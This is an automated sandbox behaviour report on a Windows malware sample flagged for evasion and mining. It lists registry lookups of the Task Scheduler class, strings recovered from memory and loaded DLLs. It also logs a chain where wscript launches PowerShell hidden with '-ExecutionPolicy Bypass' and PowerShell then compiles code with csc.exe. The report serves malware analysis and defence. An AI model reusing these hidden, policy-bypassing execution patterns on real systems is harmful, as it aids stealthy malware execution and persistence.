Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
The CLSID {0F87369F-A4E5-4CFC-BD3E-73E6154572DD} opened here is CLSID_TaskScheduler, the COM class behind the Schedule.Service interface; these lookups are what the "Creates COM task schedule object" signature listed above is based on.

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: explorer.exe, 0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: explorer.exe, 0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: explorer.exe, 0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: explorer.exe, 0000000B.00000002.3335335583.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2162912358.0000000000F13000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.v
Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000000B.00000003.3094867488.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.00000000099C0000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: powershell.exe, 0000000D.00000002.2278545178.00000289B2FA8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000000B.00000002.3342474337.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2165194690.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2165708418.0000000008870000.00000002.00000001.00040000.00000000.sdmp; String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000007.00000002.2215473665.00000224425D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2278545178.00000289B2D81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.2278545178.00000289B2FA8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000000B.00000002.3348603804.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2174037688.000000000C84A000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000B.00000002.3347671584.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2172780647.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3097166217.000000000C50F000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: powershell.exe, 00000007.00000002.2215473665.00000224425D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2278545178.00000289B2D81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: explorer.exe, 0000000B.00000002.3340185941.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3096799118.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2164458233.00000000076F8000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000B.00000002.3343227530.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000B.00000002.3340185941.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2164458233.0000000007637000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000B.00000000.2163591321.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3097682652.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3337773082.00000000035FA000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 0000000B.00000002.3343227530.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3096126515.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://excel.office.com
Source: powershell.exe, 0000000D.00000002.2278545178.00000289B2FA8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: explorer.exe, 0000000B.00000003.3094867488.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009D42000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000000B.00000000.2172780647.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3347671584.000000000C460000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 0000000B.00000003.3094867488.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.00000000099C0000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 0000000B.00000003.3094867488.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.00000000099C0000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://word.office.comon

                      System Summary

Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3500 -s 592
Source: classification engine | Classification label: mal100.expl.evad.mine.winEXE@18/26@0/0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | File created: C:\Users\user\AppData\Local\Microsoft\WindowsApps\winApps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3500
Source: C:\Windows\System32\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\d21a0362-aa82-43a5-893b-6bfb53517a2e
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | ReversingLabs: Detection: 47%
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3500 -s 592
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC35E.tmp" "c:\Users\user\AppData\Local\Temp\CSCD0EB64BB52C94309A29EE6B778E205.TMP"
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\spoxiyrj.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDA71.tmp" "c:\Users\user\AppData\Local\Temp\CSC30DB8E40DC954A908A17CE354256952F.TMP"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | Section loaded: taskschd.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe | Section loaded: mscoree.dll
Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\explorer.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\explorer.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\explorer.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
